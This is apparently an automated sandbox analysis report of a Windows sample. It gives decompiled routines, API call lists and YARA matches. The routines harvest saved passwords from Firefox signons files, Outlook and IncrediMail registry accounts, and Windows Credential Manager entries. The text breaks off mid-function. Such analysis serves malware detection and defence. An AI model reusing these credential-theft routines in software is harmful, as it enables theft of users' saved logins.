                                                                                              				if(_t40 + _t15 >= 0x104) {
                                                                                              					_v268 = 0;
                                                                                              				} else {
                                                                                              					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
                                                                                              					_pop(_t73);
                                                                                              				}
                                                                                              				_t98 =  *_t89;
                                                                                              				if( *_t89 != 0) {
                                                                                              					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
                                                                                              					_t99 = _t57;
                                                                                              					if(_t57 != 0) {
                                                                                              						E0040C475(_t73, _t86, _t99);
                                                                                              					}
                                                                                              				}
                                                                                              				_t44 = E0040614B( &_v268);
                                                                                              				_t100 = _t44;
                                                                                              				_pop(_t74);
                                                                                              				if(_t44 != 0) {
                                                                                              					E0040CE28(_t74, _t100, _t86,  &_v268);
                                                                                              				}
                                                                                              				_t70 = 0;
                                                                                              				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
                                                                                              					L19:
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t90 = E0040D438(_t70, _t86 + 0x468);
                                                                                              						_t24 = _t90 + 0x504; // 0x504
                                                                                              						_t49 = _t24;
                                                                                              						_push("none");
                                                                                              						_push(_t49);
                                                                                              						L004115B2();
                                                                                              						if(_t49 != 0) {
                                                                                              							_t25 = _t90 + 4; // 0x4
                                                                                              							_t50 = _t25;
                                                                                              							if( *_t50 == 0) {
                                                                                              								_t26 = _t90 + 0x204; // 0x204
                                                                                              								strcpy(_t50, _t26);
                                                                                              							}
                                                                                              							 *((intOrPtr*)( *_t86 + 4))(_t90);
                                                                                              						}
                                                                                              						_t70 = _t70 + 1;
                                                                                              					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
                                                                                              					goto L19;
                                                                                              				}
                                                                                              			}























                                                                                              APIs
                                                                                                • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                                • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                                • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                                • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                                • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                              • strlen.MSVCRT ref: 0040D241
                                                                                              • strlen.MSVCRT ref: 0040D24F
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              • memset.MSVCRT ref: 0040D28F
                                                                                              • strlen.MSVCRT ref: 0040D29E
                                                                                              • strlen.MSVCRT ref: 0040D2AC
                                                                                              • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                              • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                              • String ID: none$signons.sqlite$signons.txt
                                                                                              • API String ID: 2681923396-1088577317
                                                                                              • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                              • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                              • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                              • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				void _v275;
                                                                                              				char _v276;
                                                                                              				void _v1299;
                                                                                              				char _v1300;
                                                                                              				void* __esi;
                                                                                              				void* _t35;
                                                                                              				intOrPtr _t36;
                                                                                              				void* _t40;
                                                                                              				void* _t52;
                                                                                              				void* _t58;
                                                                                              				void* _t60;
                                                                                              				void* _t64;
                                                                                              				char* _t66;
                                                                                              				void* _t73;
                                                                                              				void* _t74;
                                                                                              				void* _t75;
                                                                                              				void* _t76;
                                                                                              				void* _t77;
                                                                                              				void* _t83;
                                                                                              
                                                                                              				_t83 = __fp0;
                                                                                              				_t64 = __ecx;
                                                                                              				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                                                              				_t74 = _t73 + 0xc;
                                                                                              				if(_t35 == 0) {
                                                                                              					_v12 = 0;
                                                                                              					_v276 = 0;
                                                                                              					memset( &_v275, 0, 0xff);
                                                                                              					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                                                              					_t75 = _t74 + 0x18;
                                                                                              					if(_t40 == 0) {
                                                                                              						_t66 = "%s\\%s";
                                                                                              						do {
                                                                                              							_t69 = _a4;
                                                                                              							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                                                              							_v1300 = 0;
                                                                                              							memset( &_v1299, 0, 0x3ff);
                                                                                              							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                                                              							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                                                              							_t76 = _t75 + 0x3c;
                                                                                              							_t80 = _t52;
                                                                                              							if(_t52 == 0) {
                                                                                              								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                                                              							}
                                                                                              							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                                                              							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                                                              							_t77 = _t76 + 0x1c;
                                                                                              							_t81 = _t58;
                                                                                              							if(_t58 == 0) {
                                                                                              								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                                                              							}
                                                                                              							_v12 = _v12 + 1;
                                                                                              							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                                                              							_t75 = _t77 + 0xc;
                                                                                              						} while (_t60 == 0);
                                                                                              					}
                                                                                              					RegCloseKey(_v8);
                                                                                              				}
                                                                                              				_t36 = _a4;
                                                                                              				 *((char*)(_t36 + 0xa9c)) = 0;
                                                                                              				return _t36;
                                                                                              			}



























                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 00402C84
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • memset.MSVCRT ref: 00402CDE
                                                                                              • sprintf.MSVCRT ref: 00402CF7
                                                                                              • sprintf.MSVCRT ref: 00402D35
                                                                                                • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                                • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Closememset$sprintf$EnumOpen
                                                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                              • API String ID: 1831126014-3814494228
                                                                                              • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                              • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                              • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                              • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v20;
                                                                                              				void* _v24;
                                                                                              				void* _v28;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				signed int _t45;
                                                                                              				intOrPtr _t50;
                                                                                              				signed int _t53;
                                                                                              				intOrPtr _t82;
                                                                                              				signed char _t86;
                                                                                              				intOrPtr _t88;
                                                                                              				intOrPtr _t90;
                                                                                              				void* _t91;
                                                                                              				void* _t92;
                                                                                              
                                                                                              				_t84 = __ecx;
                                                                                              				_t88 = _a4;
                                                                                              				_t92 = _t88 - 0x402;
                                                                                              				_t91 = __ecx;
                                                                                              				if(_t92 > 0) {
                                                                                              					_t45 = _t88 - 0x415;
                                                                                              					__eflags = _t45;
                                                                                              					if(_t45 == 0) {
                                                                                              						E0040A4C8(__ecx);
                                                                                              						L22:
                                                                                              						__eflags = 0;
                                                                                              						E0040A27F(0, _t84, _t91, 0);
                                                                                              						L23:
                                                                                              						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                                                              							_t81 = _a12;
                                                                                              							_t86 =  *(_a12 + 0xc);
                                                                                              							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                                                              							if((_t86 & 0x00000008) == 0) {
                                                                                              								__eflags = _t86 & 0x00000040;
                                                                                              								if((_t86 & 0x00000040) != 0) {
                                                                                              									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                                                              									__eflags =  *0x4171ac;
                                                                                              									SetFocus( *(_t50 + 0x184));
                                                                                              								}
                                                                                              							} else {
                                                                                              								E00409D7E(_t50, _t81);
                                                                                              							}
                                                                                              						}
                                                                                              						return E004019AC(_t91, _t88, _a8, _a12);
                                                                                              					}
                                                                                              					_t53 = _t45 - 1;
                                                                                              					__eflags = _t53;
                                                                                              					if(_t53 == 0) {
                                                                                              						E0040A56C(__ecx);
                                                                                              						goto L22;
                                                                                              					}
                                                                                              					__eflags = _t53 == 6;
                                                                                              					if(_t53 == 6) {
                                                                                              						SetFocus( *(__ecx + 0x378));
                                                                                              					}
                                                                                              					goto L23;
                                                                                              				}
                                                                                              				if(_t92 == 0) {
                                                                                              					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                                                              					E0040A437(__ecx);
                                                                                              					goto L22;
                                                                                              				}
                                                                                              				if(_t88 == 0x1c) {
                                                                                              					__eflags = _a8;
                                                                                              					if(_a8 == 0) {
                                                                                              						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                                                              					} else {
                                                                                              						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                                                              					}
                                                                                              					goto L23;
                                                                                              				}
                                                                                              				if(_t88 == 0x20) {
                                                                                              					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                                                              					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                              						goto L23;
                                                                                              					}
                                                                                              					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                              					return 1;
                                                                                              				}
                                                                                              				if(_t88 == 0x2b) {
                                                                                              					_t82 = _a12;
                                                                                              					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                                                              					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                              						SetBkMode( *(_t82 + 0x18), 1);
                                                                                              						SetTextColor( *(_t82 + 0x18), 0xff0000);
                                                                                              						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
                                                                                              						asm("stosd");
                                                                                              						asm("stosd");
                                                                                              						asm("stosd");
                                                                                              						asm("stosd");
                                                                                              						_t90 = _a12;
                                                                                              						_v28 = 0x14;
                                                                                              						_v20 = 5;
                                                                                              						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
                                                                                              						SelectObject( *(_t90 + 0x18), _v8);
                                                                                              						_t88 = _a4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					if(_t88 == 0x7b) {
                                                                                              						_t87 = _a8;
                                                                                              						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                                                              							E0040B372(__ecx, _t87);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				goto L23;
                                                                                              			}



















                                                                                              APIs
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                              • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                              • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                                • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                                • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                                • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                              • LoadCursorA.USER32 ref: 0040B63A
                                                                                              • SetCursor.USER32(00000000), ref: 0040B641
                                                                                              • PostMessageA.USER32 ref: 0040B663
                                                                                              • SetFocus.USER32(?), ref: 0040B69E
                                                                                              • SetFocus.USER32(?), ref: 0040B6EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                              • String ID:
                                                                                              • API String ID: 1416211542-0
                                                                                              • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                              • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                              • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                              • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                              				long _v8;
                                                                                              				void* _v12;
                                                                                              				long _v16;
                                                                                              				void* _t14;
                                                                                              				void* _t29;
                                                                                              				void* _t34;
                                                                                              				long _t36;
                                                                                              
                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                              				EmptyClipboard();
                                                                                              				_t14 = E00405ECB(_a4);
                                                                                              				_v12 = _t14;
                                                                                              				if(_t14 == 0xffffffff) {
                                                                                              					_v8 = GetLastError();
                                                                                              				} else {
                                                                                              					_t36 = GetFileSize(_t14, 0);
                                                                                              					_t5 = _t36 + 1; // 0x1
                                                                                              					_t29 = GlobalAlloc(0x2000, _t5);
                                                                                              					if(_t29 == 0) {
                                                                                              						L4:
                                                                                              						_v8 = GetLastError();
                                                                                              					} else {
                                                                                              						_t34 = GlobalLock(_t29);
                                                                                              						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
                                                                                              							goto L4;
                                                                                              						} else {
                                                                                              							 *((char*)(_t34 + _t36)) = 0;
                                                                                              							GlobalUnlock(_t29);
                                                                                              							SetClipboardData(1, _t29);
                                                                                              						}
                                                                                              					}
                                                                                              					CloseHandle(_v12);
                                                                                              				}
                                                                                              				CloseClipboard();
                                                                                              				return _v8;
                                                                                              			}











                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 00405FD0
                                                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                              • GlobalLock.KERNEL32 ref: 0040600B
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                              • SetClipboardData.USER32 ref: 00406036
                                                                                              • GetLastError.KERNEL32 ref: 0040603E
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                              • GetLastError.KERNEL32 ref: 00406055
                                                                                              • CloseClipboard.USER32 ref: 0040605E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3604893535-0
                                                                                              • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                              • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                              • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                              • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 3177657795-318151290
                                                                                              • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                              • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                              • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                              • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E0040765B(void* __eflags, intOrPtr* _a4) {
                                                                                              				char _v532;
                                                                                              				short _v534;
                                                                                              				void _v1042;
                                                                                              				void _v1044;
                                                                                              				long _v1080;
                                                                                              				intOrPtr _v1084;
                                                                                              				intOrPtr _v1088;
                                                                                              				intOrPtr _v1096;
                                                                                              				int _v1104;
                                                                                              				char _v1108;
                                                                                              				intOrPtr _v1112;
                                                                                              				intOrPtr _v1116;
                                                                                              				intOrPtr _v1120;
                                                                                              				intOrPtr _v1124;
                                                                                              				intOrPtr _v1128;
                                                                                              				intOrPtr _v1132;
                                                                                              				long* _v1136;
                                                                                              				wchar_t* _v1140;
                                                                                              				wchar_t* _v1144;
                                                                                              				intOrPtr _v1148;
                                                                                              				char _v1152;
                                                                                              				intOrPtr _v1156;
                                                                                              				char _v1160;
                                                                                              				void* _v1164;
                                                                                              				void* _v1168;
                                                                                              				int _v1172;
                                                                                              				intOrPtr _v1176;
                                                                                              				char _v1180;
                                                                                              				char _v1184;
                                                                                              				signed int _v1188;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t76;
                                                                                              				int _t83;
                                                                                              				wchar_t* _t109;
                                                                                              				wchar_t* _t110;
                                                                                              				signed int _t120;
                                                                                              				int _t126;
                                                                                              				void* _t129;
                                                                                              				intOrPtr _t134;
                                                                                              				signed int _t140;
                                                                                              				void* _t142;
                                                                                              				void* _t143;
                                                                                              				void* _t144;
                                                                                              
                                                                                              				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                                                              				_push(_t129);
                                                                                              				_v1108 = 0;
                                                                                              				_v1104 = 0;
                                                                                              				if(E00404647( &_v1108, _t129, __eflags) != 0) {
                                                                                              					_v1184 = 0;
                                                                                              					_v1180 = 0;
                                                                                              					if(_v1088 == 0) {
                                                                                              						_t76 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                                                              					}
                                                                                              					if(_t76 != 0) {
                                                                                              						_t120 = 9;
                                                                                              						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                                                              						_t143 = _t142 + 0xc;
                                                                                              						_v1172 = wcslen( &_v1080);
                                                                                              						_v1176 = 1;
                                                                                              						_v1188 = 0;
                                                                                              						if(_v1180 > 0) {
                                                                                              							while(_v1176 != 0) {
                                                                                              								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                                                              								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                                                              								_t143 = _t143 + 0xc;
                                                                                              								if(_t83 == 0) {
                                                                                              									do {
                                                                                              										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                                                              										 *(_t83 + 0x417968) =  *_t25 << 2;
                                                                                              										_t83 = _t83 + 2;
                                                                                              										_t152 = _t83 - 0x4a;
                                                                                              									} while (_t83 < 0x4a);
                                                                                              									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                                                              									_t139 =  &_v532;
                                                                                              									_v1160 = 0x4a;
                                                                                              									_v1156 = 0x417968;
                                                                                              									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                                                              									E004046D7( &_v532);
                                                                                              									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                                                              										_v1044 = 0;
                                                                                              										memset( &_v1042, 0, 0x1fe);
                                                                                              										_t126 = _v1168;
                                                                                              										_t144 = _t143 + 0xc;
                                                                                              										if(_t126 > 0x1fa) {
                                                                                              											_t126 = 0x1fa;
                                                                                              										}
                                                                                              										memcpy( &_v1044, _v1164, _t126);
                                                                                              										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                                                              										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                                                              										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                                                              										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                                                              										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                                                              										_v1144 =  *(_t134 + 8);
                                                                                              										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                                                              										_t109 =  &_v1044;
                                                                                              										_v534 = 0;
                                                                                              										_v1140 = _t109;
                                                                                              										_v1136 = 0x4125f4;
                                                                                              										_t110 = wcschr(_t109, 0x3a);
                                                                                              										_t143 = _t144 + 0x14;
                                                                                              										if(_t110 != 0) {
                                                                                              											 *_t110 = 0;
                                                                                              											_v1136 =  &(_t110[0]);
                                                                                              										}
                                                                                              										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                                                              										LocalFree(_v1168);
                                                                                              									}
                                                                                              									E004047F1( &_v532);
                                                                                              								}
                                                                                              								_v1188 = _v1188 + 1;
                                                                                              								if(_v1188 < _v1180) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L18;
                                                                                              							}
                                                                                              						}
                                                                                              						L18:
                                                                                              						_v1096(_v1184);
                                                                                              					}
                                                                                              				}
                                                                                              				return E004046C2( &_v1108);
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                              • wcslen.MSVCRT ref: 004076C5
                                                                                              • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                              • memset.MSVCRT ref: 0040779D
                                                                                              • memcpy.MSVCRT ref: 004077C1
                                                                                              • wcschr.MSVCRT ref: 00407815
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                              • String ID: J$Microsoft_WinInet$hyA
                                                                                              • API String ID: 2413121283-319027496
                                                                                              • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                              • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                              • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                              • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				void _v271;
                                                                                              				char _v272;
                                                                                              				void _v527;
                                                                                              				char _v528;
                                                                                              				void _v827;
                                                                                              				char _v828;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				long _t40;
                                                                                              				void* _t44;
                                                                                              				void* _t55;
                                                                                              				void* _t60;
                                                                                              				void* _t66;
                                                                                              				void* _t67;
                                                                                              				void* _t71;
                                                                                              				void* _t72;
                                                                                              				void* _t73;
                                                                                              				void* _t74;
                                                                                              				void* _t77;
                                                                                              
                                                                                              				_t77 = __fp0;
                                                                                              				_t66 = __ecx;
                                                                                              				_t67 = __eax;
                                                                                              				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
                                                                                              				_t72 = _t71 + 0xc;
                                                                                              				if(_t40 == 0) {
                                                                                              					_v12 = 0;
                                                                                              					_v272 = 0;
                                                                                              					memset( &_v271, 0, 0xff);
                                                                                              					_t44 = E0040EC05(_a4, 0,  &_v272);
                                                                                              					_t73 = _t72 + 0x18;
                                                                                              					while(_t44 == 0) {
                                                                                              						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                                                              						_v828 = 0;
                                                                                              						memset( &_v827, 0, 0x12b);
                                                                                              						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                                                              						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
                                                                                              						_t74 = _t73 + 0x38;
                                                                                              						if(_t55 == 0) {
                                                                                              							_v16 = 0;
                                                                                              							_v528 = 0;
                                                                                              							memset( &_v527, 0, 0xff);
                                                                                              							_t60 = E0040EC05(_v8, 0,  &_v528);
                                                                                              							_t74 = _t74 + 0x18;
                                                                                              							while(_t60 == 0) {
